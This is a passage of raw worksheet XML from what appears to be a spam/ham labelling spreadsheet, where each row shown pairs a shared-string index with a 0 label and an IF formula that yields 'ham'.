      <c r="A4543" t="s">
        <v>3895</v>
      </c>
      <c r="B4543">
        <v>0</v>
      </c>
      <c r="C4543" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4544" t="s">
        <v>3896</v>
      </c>
      <c r="B4544">
        <v>0</v>
      </c>
      <c r="C4544" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4545" t="s">
        <v>3897</v>
      </c>
      <c r="B4545">
        <v>0</v>
      </c>
      <c r="C4545" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4546" t="s">
        <v>3898</v>
      </c>
      <c r="B4546">
        <v>0</v>
      </c>
      <c r="C4546" t="str">
        <f t="shared" ref="C4546:C4609" si="71">IF(B4546="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4547" t="s">
        <v>3899</v>
      </c>
      <c r="B4547">
        <v>0</v>
      </c>
      <c r="C4547" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4548" t="s">
        <v>3900</v>
      </c>
      <c r="B4548">
        <v>0</v>
      </c>
      <c r="C4548" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4549" t="s">
        <v>3901</v>
      </c>
      <c r="B4549">
        <v>0</v>
      </c>
      <c r="C4549" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4550" t="s">
        <v>3902</v>
      </c>
      <c r="B4550">
        <v>0</v>
      </c>
      <c r="C4550" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4551" t="s">
        <v>3903</v>
      </c>
      <c r="B4551">
        <v>0</v>
      </c>
      <c r="C4551" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4552" t="s">
        <v>3904</v>
      </c>
      <c r="B4552">
        <v>0</v>
      </c>
      <c r="C4552" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4553" t="s">
        <v>3905</v>
      </c>
      <c r="B4553">
        <v>0</v>
      </c>
      <c r="C4553" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4554" t="s">
        <v>3906</v>
      </c>
      <c r="B4554">
        <v>0</v>
      </c>
      <c r="C4554" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4555" t="s">
        <v>3907</v>
      </c>
      <c r="B4555">
        <v>0</v>
      </c>
      <c r="C4555" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4556" t="s">
        <v>3908</v>
      </c>
      <c r="B4556">
        <v>0</v>
      </c>
      <c r="C4556" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4557" t="s">
        <v>3909</v>
      </c>
      <c r="B4557">
        <v>0</v>
      </c>
      <c r="C4557" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4558" t="s">
        <v>3910</v>
      </c>
      <c r="B4558">
        <v>0</v>
      </c>
      <c r="C4558" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4559" t="s">
        <v>3911</v>
      </c>
      <c r="B4559">
        <v>0</v>
      </c>
      <c r="C4559" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4560" t="s">
        <v>3912</v>
      </c>
      <c r="B4560">
        <v>0</v>
      </c>
      <c r="C4560" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4561" t="s">
        <v>3913</v>
      </c>
      <c r="B4561">
        <v>0</v>
      </c>
      <c r="C4561" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4562" t="s">
        <v>3914</v>
      </c>
      <c r="B4562">
        <v>0</v>
      </c>
      <c r="C4562" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4563" t="s">
        <v>3915</v>
      </c>
      <c r="B4563">
        <v>0</v>
      </c>
      <c r="C4563" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4564" t="s">
        <v>3916</v>
      </c>
      <c r="B4564">
        <v>0</v>
      </c>
      <c r="C4564" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4565" t="s">
        <v>3917</v>
      </c>
      <c r="B4565">
        <v>0</v>
      </c>
      <c r="C4565" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4566" t="s">
        <v>3918</v>
      </c>
      <c r="B4566">
        <v>0</v>
      </c>
      <c r="C4566" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4567" t="s">
        <v>3919</v>
      </c>
      <c r="B4567">
        <v>0</v>
      </c>
      <c r="C4567" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4568" t="s">
        <v>3920</v>
      </c>
      <c r="B4568">
        <v>0</v>
      </c>
      <c r="C4568" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4569" t="s">
        <v>3921</v>
      </c>
      <c r="B4569">
        <v>0</v>
      </c>
      <c r="C4569" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4570" t="s">
        <v>3922</v>
      </c>
      <c r="B4570">
        <v>0</v>
      </c>
      <c r="C4570" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4571" t="s">
        <v>3923</v>
      </c>
      <c r="B4571">
        <v>0</v>
      </c>
      <c r="C4571" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4572" t="s">
        <v>3924</v>
      </c>
      <c r="B4572">
        <v>0</v>
      </c>
      <c r="C4572" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4573" t="s">
        <v>3925</v>
      </c>
      <c r="B4573">
        <v>0</v>
      </c>
      <c r="C4573" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4574" t="s">
        <v>3926</v>
      </c>
      <c r="B4574">
        <v>0</v>
      </c>
      <c r="C4574" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4575" t="s">
        <v>3927</v>
      </c>
      <c r="B4575">
        <v>0</v>
      </c>
      <c r="C4575" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4576" t="s">
        <v>3928</v>
      </c>
      <c r="B4576">
        <v>0</v>
      </c>
      <c r="C4576" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4577" t="s">
        <v>3929</v>
      </c>
      <c r="B4577">
        <v>0</v>
      </c>
      <c r="C4577" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4578" t="s">
        <v>3930</v>
      </c>
      <c r="B4578">
        <v>0</v>
      </c>
      <c r="C4578" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4579" t="s">
        <v>3931</v>
      </c>
      <c r="B4579">
        <v>0</v>
      </c>
      <c r="C4579" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4580" t="s">
        <v>3932</v>
      </c>
      <c r="B4580">
        <v>0</v>
      </c>
      <c r="C4580" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4581" t="s">
        <v>3933</v>
      </c>
      <c r="B4581">
        <v>0</v>
      </c>
      <c r="C4581" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4582" t="s">
        <v>3934</v>
      </c>
      <c r="B4582">
        <v>0</v>
      </c>
      <c r="C4582" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4583" t="s">
        <v>3935</v>
      </c>
      <c r="B4583">
        <v>0</v>
      </c>
      <c r="C4583" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4584" t="s">
        <v>3936</v>
      </c>
      <c r="B4584">
        <v>0</v>
      </c>
      <c r="C4584" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4585" t="s">
        <v>3937</v>
      </c>
      <c r="B4585">
        <v>0</v>
      </c>
      <c r="C4585" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4586" t="s">
        <v>3938</v>
      </c>
      <c r="B4586">
        <v>0</v>
      </c>
      <c r="C4586" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4587" t="s">
        <v>3939</v>
      </c>
      <c r="B4587">
        <v>0</v>
      </c>
      <c r="C4587" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4588" t="s">
        <v>3940</v>
      </c>
      <c r="B4588">
        <v>0</v>
      </c>
      <c r="C4588" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4589" t="s">
        <v>3941</v>
      </c>
      <c r="B4589">
        <v>0</v>
      </c>
      <c r="C4589" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4590" t="s">
        <v>3942</v>
      </c>
      <c r="B4590">
        <v>0</v>
      </c>
      <c r="C4590" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4591" t="s">
        <v>3943</v>
      </c>
      <c r="B4591">
        <v>0</v>
      </c>
      <c r="C4591" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4592" t="s">
        <v>3944</v>
      </c>
      <c r="B4592">
        <v>0</v>
      </c>
      <c r="C4592" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4593" t="s">
        <v>3945</v>
      </c>
      <c r="B4593">
        <v>0</v>
      </c>
      <c r="C4593" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4594" t="s">
        <v>3946</v>
      </c>
      <c r="B4594">
        <v>0</v>
      </c>
      <c r="C4594" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4595" t="s">
        <v>3947</v>
      </c>
      <c r="B4595">
        <v>0</v>
      </c>
      <c r="C4595" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4596" t="s">
        <v>3948</v>
      </c>
      <c r="B4596">
        <v>0</v>
      </c>
      <c r="C4596" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4597" t="s">
        <v>3949</v>
      </c>
      <c r="B4597">
        <v>0</v>
      </c>
      <c r="C4597" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4598" t="s">
        <v>3950</v>
      </c>
      <c r="B4598">
        <v>0</v>
      </c>
      <c r="C4598" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4599" t="s">
        <v>3951</v>
      </c>
      <c r="B4599">
        <v>0</v>
      </c>
      <c r="C4599" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4600" t="s">
        <v>3952</v>
      </c>
      <c r="B4600">
        <v>0</v>
      </c>
      <c r="C4600" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4601" t="s">
        <v>3953</v>
      </c>
      <c r="B4601">
        <v>0</v>
      </c>
      <c r="C4601" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4602" t="s">
        <v>3954</v>
      </c>
      <c r="B4602">
        <v>0</v>
      </c>
      <c r="C4602" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4603" t="s">
        <v>3955</v>
      </c>
      <c r="B4603">
        <v>0</v>
      </c>
      <c r="C4603" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4604" t="s">
        <v>3956</v>
      </c>
      <c r="B4604">
        <v>0</v>
      </c>
      <c r="C4604" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4605" t="s">
        <v>3957</v>
      </c>
      <c r="B4605">
        <v>0</v>
      </c>
      <c r="C4605" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4606" t="s">
        <v>3958</v>
      </c>
      <c r="B4606">
        <v>0</v>
      </c>
      <c r="C4606" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4607" t="s">
        <v>3959</v>
      </c>
      <c r="B4607">
        <v>0</v>
      </c>
      <c r="C4607" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4608" t="s">
        <v>3960</v>
      </c>
      <c r="B4608">
        <v>0</v>
      </c>
      <c r="C4608" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4609" t="s">
        <v>3961</v>
      </c>
      <c r="B4609">
        <v>0</v>
      </c>
      <c r="C4609" t="str">
        <f t="shared" si="71"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4610" t="s">
        <v>3962</v>
      </c>
      <c r="B4610">
        <v>0</v>
      </c>
      <c r="C4610" t="str">
        <f t="shared" ref="C4610:C4673" si="72">IF(B4610="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4611" t="s">
        <v>3963</v>
      </c>
      <c r="B4611">
        <v>0</v>
      </c>
      <c r="C4611" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4612" t="s">
        <v>3964</v>
      </c>
      <c r="B4612">
        <v>0</v>
      </c>
      <c r="C4612" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4613" t="s">
        <v>3965</v>
      </c>
      <c r="B4613">
        <v>0</v>
      </c>
      <c r="C4613" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4614" t="s">
        <v>3966</v>
      </c>
      <c r="B4614">
        <v>0</v>
      </c>
      <c r="C4614" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4615" t="s">
        <v>3967</v>
      </c>
      <c r="B4615">
        <v>0</v>
      </c>
      <c r="C4615" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4616" t="s">
        <v>3968</v>
      </c>
      <c r="B4616">
        <v>0</v>
      </c>
      <c r="C4616" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4617" t="s">
        <v>3969</v>
      </c>
      <c r="B4617">
        <v>0</v>
      </c>
      <c r="C4617" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4618" t="s">
        <v>3970</v>
      </c>
      <c r="B4618">
        <v>0</v>
      </c>
      <c r="C4618" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4619" t="s">
        <v>3971</v>
      </c>
      <c r="B4619">
        <v>0</v>
      </c>
      <c r="C4619" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4620" t="s">
        <v>3972</v>
      </c>
      <c r="B4620">
        <v>0</v>
      </c>
      <c r="C4620" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4621" t="s">
        <v>3973</v>
      </c>
      <c r="B4621">
        <v>0</v>
      </c>
      <c r="C4621" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4622" t="s">
        <v>3974</v>
      </c>
      <c r="B4622">
        <v>0</v>
      </c>
      <c r="C4622" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4623" t="s">
        <v>3975</v>
      </c>
      <c r="B4623">
        <v>0</v>
      </c>
      <c r="C4623" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4624" t="s">
        <v>3976</v>
      </c>
      <c r="B4624">
        <v>0</v>
      </c>
      <c r="C4624" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4625" t="s">
        <v>3977</v>
      </c>
      <c r="B4625">
        <v>0</v>
      </c>
      <c r="C4625" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4626" t="s">
        <v>3978</v>
      </c>
      <c r="B4626">
        <v>0</v>
      </c>
      <c r="C4626" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4627" t="s">
        <v>3979</v>
      </c>
      <c r="B4627">
        <v>0</v>
      </c>
      <c r="C4627" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4628" t="s">
        <v>3980</v>
      </c>
      <c r="B4628">
        <v>0</v>
      </c>
      <c r="C4628" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4629" t="s">
        <v>3981</v>
      </c>
      <c r="B4629">
        <v>0</v>
      </c>
      <c r="C4629" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4630" t="s">
        <v>3982</v>
      </c>
      <c r="B4630">
        <v>0</v>
      </c>
      <c r="C4630" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4631" t="s">
        <v>3983</v>
      </c>
      <c r="B4631">
        <v>0</v>
      </c>
      <c r="C4631" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4632" t="s">
        <v>3984</v>
      </c>
      <c r="B4632">
        <v>0</v>
      </c>
      <c r="C4632" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4633" t="s">
        <v>3962</v>
      </c>
      <c r="B4633">
        <v>0</v>
      </c>
      <c r="C4633" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4634" t="s">
        <v>3985</v>
      </c>
      <c r="B4634">
        <v>0</v>
      </c>
      <c r="C4634" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4635" t="s">
        <v>3986</v>
      </c>
      <c r="B4635">
        <v>0</v>
      </c>
      <c r="C4635" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4636" t="s">
        <v>3987</v>
      </c>
      <c r="B4636">
        <v>0</v>
      </c>
      <c r="C4636" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4637" t="s">
        <v>3988</v>
      </c>
      <c r="B4637">
        <v>0</v>
      </c>
      <c r="C4637" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4638" t="s">
        <v>3989</v>
      </c>
      <c r="B4638">
        <v>0</v>
      </c>
      <c r="C4638" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4639" t="s">
        <v>3990</v>
      </c>
      <c r="B4639">
        <v>0</v>
      </c>
      <c r="C4639" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4640" t="s">
        <v>3962</v>
      </c>
      <c r="B4640">
        <v>0</v>
      </c>
      <c r="C4640" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4641" t="s">
        <v>3991</v>
      </c>
      <c r="B4641">
        <v>0</v>
      </c>
      <c r="C4641" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4642" t="s">
        <v>3992</v>
      </c>
      <c r="B4642">
        <v>0</v>
      </c>
      <c r="C4642" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4643" t="s">
        <v>3993</v>
      </c>
      <c r="B4643">
        <v>0</v>
      </c>
      <c r="C4643" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4644" t="s">
        <v>3994</v>
      </c>
      <c r="B4644">
        <v>0</v>
      </c>
      <c r="C4644" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4645" t="s">
        <v>3995</v>
      </c>
      <c r="B4645">
        <v>0</v>
      </c>
      <c r="C4645" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4646" t="s">
        <v>3996</v>
      </c>
      <c r="B4646">
        <v>0</v>
      </c>
      <c r="C4646" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4647" t="s">
        <v>3997</v>
      </c>
      <c r="B4647">
        <v>0</v>
      </c>
      <c r="C4647" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4648" t="s">
        <v>3998</v>
      </c>
      <c r="B4648">
        <v>0</v>
      </c>
      <c r="C4648" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4649" t="s">
        <v>3999</v>
      </c>
      <c r="B4649">
        <v>0</v>
      </c>
      <c r="C4649" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4650" t="s">
        <v>4000</v>
      </c>
      <c r="B4650">
        <v>0</v>
      </c>
      <c r="C4650" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4651" t="s">
        <v>4001</v>
      </c>
      <c r="B4651">
        <v>0</v>
      </c>
      <c r="C4651" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4652" t="s">
        <v>4002</v>
      </c>
      <c r="B4652">
        <v>0</v>
      </c>
      <c r="C4652" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4653" t="s">
        <v>4003</v>
      </c>
      <c r="B4653">
        <v>0</v>
      </c>
      <c r="C4653" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4654" t="s">
        <v>4004</v>
      </c>
      <c r="B4654">
        <v>0</v>
      </c>
      <c r="C4654" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4655" t="s">
        <v>4005</v>
      </c>
      <c r="B4655">
